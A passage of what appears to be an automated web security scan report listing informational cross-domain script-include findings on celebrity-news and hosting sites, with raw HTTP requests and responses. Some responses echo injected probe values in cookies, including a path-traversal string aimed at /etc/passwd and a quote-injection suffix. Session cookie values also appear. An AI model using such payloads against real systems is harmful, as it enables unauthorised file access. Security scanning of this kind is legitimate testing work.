<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>


<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gumgum.com/javascripts/ggv2.js"></script>
...[SNIP]...

18.196. http://www.tmz.com/signin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /signin/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /signin/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_campaign=hero1; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DJustin%252520Timberlake%25253A%252520%252520Not%252520My%252520Penis%252521%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/signin/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:02:07 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:02:07 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2%2527; expires=Sun, 20-Feb-2028 01:02:07 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 49975
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>


<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gumgum.com/javascripts/ggv2.js"></script>
...[SNIP]...

18.197. http://www.toofab.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toofab.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:50:30 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 47513
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<![endif]-->

   
   <script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/jquery-1-6-1.min.d8875603a0b162e5b849dc1d102c766d.v2011_07_15_144156.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/cufon-yui.c6ac5afc9cfc7a5d82479ef479909d1c.v2011_09_16_184103.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/AvantGarde_LT_Bold_400.font.161f7dd76cc19bad6472f2e9244f88fb.v2011_09_16_184103.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/util.f7d4b94145cbc2061dd93ae4b1c92468.v2011_09_16_184103.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
<!-- end -->
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/twitter-bar.15908d717911f0ed8486edc047adf247.v2011_09_16_184103.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
http://www.omniture.com -->
<script language="JavaScript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/js/s_code_toofab.v2010_04_10_102624.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- End Quantcast tag -->
    <script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

18.198. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toofab.com
Path:   /2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1777464361-1316238721670; phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; s_cc=true; s_sq=wbrostoofab%3D%2526pid%253DCeleb%252520Couples%252520%25257C%252520tooFab%252521%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:08:42 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:08:42 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd; expires=Sun, 20-Feb-2028 01:08:42 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 41681
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<![endif]-->

   
   <script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/jquery-1-6-1.min.d8875603a0b162e5b849dc1d102c766d.v2011_07_15_144156.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/cufon-yui.c6ac5afc9cfc7a5d82479ef479909d1c.v2011_09_16_184103.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/AvantGarde_LT_Bold_400.font.161f7dd76cc19bad6472f2e9244f88fb.v2011_09_16_184103.js"></script>
...[SNIP]...
</script>


<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/util.f7d4b94145cbc2061dd93ae4b1c92468.v2011_09_16_184103.js"></script>
...[SNIP]...
rel="stylesheet" type="text/css" media="screen" href="http://ll-assets.tmz.com/www.toofab.com/default/cache/community.5894eddf551fa64f356697e71dc5854e.v2011_09_16_184103.css" />

   
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/jquery.tmpl.min.00c4e3ccc9edbcdfad224af0ec5b3fd5.v2011_09_16_184103.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/MyLink.7dffd7710df7247e6535b4514446f95c.v2011_09_16_200959.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/moderated-content.7608a00810194970d3e391b6eb15ec49.v2011_09_16_200955.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/CommentForm.93dad57724e889ec6be49e0e6b69a91d.v2011_09_16_184103.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/commentReplie.9f4c56f9686224ae43fa74fc394f4e5e.v2011_09_16_200855.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/vote.cbd824fe533f76194a1e3bb982959cfd.v2011_09_16_201026.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
http://www.omniture.com -->
<script language="JavaScript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/js/s_code_toofab.v2010_04_10_102624.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

18.199. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toofab.com
Path:   /2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __qca=P0-1777464361-1316238721670; s_sq=wbrostoofab%3D%2526pid%253DTooFab%252520Homepage%252520%25255B%25255D%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:50:59 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:50:59 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; expires=Sun, 20-Feb-2028 00:50:59 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 71853
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<![endif]-->

   
   <script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/jquery-1-6-1.min.d8875603a0b162e5b849dc1d102c766d.v2011_07_15_144156.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/cufon-yui.c6ac5afc9cfc7a5d82479ef479909d1c.v2011_09_16_184103.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/AvantGarde_LT_Bold_400.font.161f7dd76cc19bad6472f2e9244f88fb.v2011_09_16_184103.js"></script>
...[SNIP]...
</script>


<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/util.f7d4b94145cbc2061dd93ae4b1c92468.v2011_09_16_184103.js"></script>
...[SNIP]...
rel="stylesheet" type="text/css" media="screen" href="http://ll-assets.tmz.com/www.toofab.com/default/cache/community.5894eddf551fa64f356697e71dc5854e.v2011_09_16_184103.css" />

   
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/jquery.tmpl.min.00c4e3ccc9edbcdfad224af0ec5b3fd5.v2011_09_16_184103.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/MyLink.7dffd7710df7247e6535b4514446f95c.v2011_09_16_200959.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/moderated-content.7608a00810194970d3e391b6eb15ec49.v2011_09_16_200955.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/CommentForm.93dad57724e889ec6be49e0e6b69a91d.v2011_09_16_184103.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/commentReplie.9f4c56f9686224ae43fa74fc394f4e5e.v2011_09_16_200855.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/vote.cbd824fe533f76194a1e3bb982959cfd.v2011_09_16_201026.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
http://www.omniture.com -->
<script language="JavaScript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/js/s_code_toofab.v2010_04_10_102624.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

18.200. http://www.toofab.com/category/celeb-couples/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toofab.com
Path:   /category/celeb-couples/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/celeb-couples/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1777464361-1316238721670; phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; s_cc=true; s_sq=wbrostoofab%3D%2526pid%253DHollywood%252520News%25252C%252520Red%252520Carpet%252520Fashion%252520and%252520Celebrity%252520Hairstyles%252520%25257C%252520tooFab.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/category/celeb-couples/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:08:08 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:08:09 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; expires=Sun, 20-Feb-2028 01:08:08 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 31377
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/
...[SNIP]...
<![endif]-->

   
   <script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/jquery-1-6-1.min.d8875603a0b162e5b849dc1d102c766d.v2011_07_15_144156.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/cufon-yui.c6ac5afc9cfc7a5d82479ef479909d1c.v2011_09_16_184103.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/AvantGarde_LT_Bold_400.font.161f7dd76cc19bad6472f2e9244f88fb.v2011_09_16_184103.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/util.f7d4b94145cbc2061dd93ae4b1c92468.v2011_09_16_184103.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
http://www.omniture.com -->
<script language="JavaScript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/js/s_code_toofab.v2010_04_10_102624.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- End Quantcast tag -->
<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

18.201. http://www.toofab.com/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toofab.com
Path:   /news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1777464361-1316238721670; phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; s_cc=true; s_sq=wbrostoofab%3D%2526pid%253DTooFab%252520News%252520Page%252520%25255BExclusive%25253A%252520Melissa%252520Rivers%252520Splits%252520With%252520Boyfriend%25255D%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/news/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:51:43 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:51:44 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; expires=Sun, 20-Feb-2028 00:51:43 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 37064
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="text/jav
...[SNIP]...
<![endif]-->

   
   <script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/jquery-1-6-1.min.d8875603a0b162e5b849dc1d102c766d.v2011_07_15_144156.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/cufon-yui.c6ac5afc9cfc7a5d82479ef479909d1c.v2011_09_16_184103.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/AvantGarde_LT_Bold_400.font.161f7dd76cc19bad6472f2e9244f88fb.v2011_09_16_184103.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/util.f7d4b94145cbc2061dd93ae4b1c92468.v2011_09_16_184103.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
http://www.omniture.com -->
<script language="JavaScript" src="http://ll-assets.tmz.com/www.toofab.com/default/cache/js/s_code_toofab.v2010_04_10_102624.js"></script>
...[SNIP]...
</div>
<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

18.202. http://www.usenetbinaries.com/l/newsgroups.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usenetbinaries.com
Path:   /l/newsgroups.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /l/newsgroups.html?r=aw;kw=usenet&gclid=CLHh78_AoqsCFRRSgwod8HVslQ HTTP/1.1
Host: www.usenetbinaries.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:26 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 6237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title>
Newsgroups - Usenet Binaries Dot Com
</title>

<meta name="keywords" con
...[SNIP]...
<!-- Google Analytics -->

<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">

</script>
...[SNIP]...

18.203. http://www.virtuecom.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtuecom.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.virtuecom.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 00:25:18 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 00:25:17 GMT
Content-Length: 21169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
<script defer="defer" type="text/javascript" src="https://livechat.volusion.com/script.aspx?id=307030" ></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4d8295217c1b6afb"></script>
...[SNIP]...

18.204. http://www.westhost.com/images/bluegradbg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.westhost.com
Path:   /images/bluegradbg.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/bluegradbg.gif HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15689
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" itemscope itemtype
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/404.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script>
...[SNIP]...

18.205. http://www.westhost.com/images/boxtopbackground.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.westhost.com
Path:   /images/boxtopbackground.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/boxtopbackground.gif HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15695
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" itemscope itemtype
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/404.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script>
...[SNIP]...

19. TRACE method is enabled  previous  next
There are 32 instances of this issue:

